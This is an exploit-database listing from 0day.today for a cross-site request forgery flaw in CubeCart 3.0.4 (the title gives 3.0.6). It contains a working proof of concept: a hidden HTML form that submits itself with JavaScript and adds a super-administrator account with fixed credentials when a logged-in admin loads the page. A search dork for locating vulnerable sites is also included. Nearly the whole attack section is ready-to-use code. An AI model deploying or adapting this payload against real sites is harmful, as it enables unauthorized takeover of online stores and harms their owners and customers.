[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

CubeCart 3.0.6 <= CSRF Vulnerability (Add Admin)

Author
P0C T34M
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-15238
Category
web applications
Date add
25-12-2010
Platform
php
#Title    : CubeCart 3.0.4 <= CSRF Add Admin
#Script   : CubeCart 3.0.4
#Language : Php
#Download : http://www.cubecart.com/
#Date     : 2010/12/24
#Version  : 3.0.4
#Dork     : "Powered by CubeCart 3.0.4"
#Found    : by P0C T34M >> tnt-r00t
#Homepage : www.p0c.cc
 
 
<form name="p0c" action="http://127.0.0.1/cc/admin/adminusers/administrators.php?mode=new" method="post">
 
          <input name="name" type="hidden" value="myname"/ >
    <input name="adminUsername" type="hidden" value="r00t" />
    <input name="email" type="hidden" value="myemail@hotmail.com">
        <input name="adminPassword" type="hidden"  value="t00r" />
    <input name="isSuper" type="hidden" value="1" checked="checked" type="radio"/>
    <input name="adminId" value="" type="hidden"/>
    <input name="Submit" type="hidden" class="submit" value="Add User" type="submit"/>
  
  
</form>
<script>document.p0c.submit();</script>
 
NICKNAME: P0C T34M



#  0day.today [2024-12-24]  #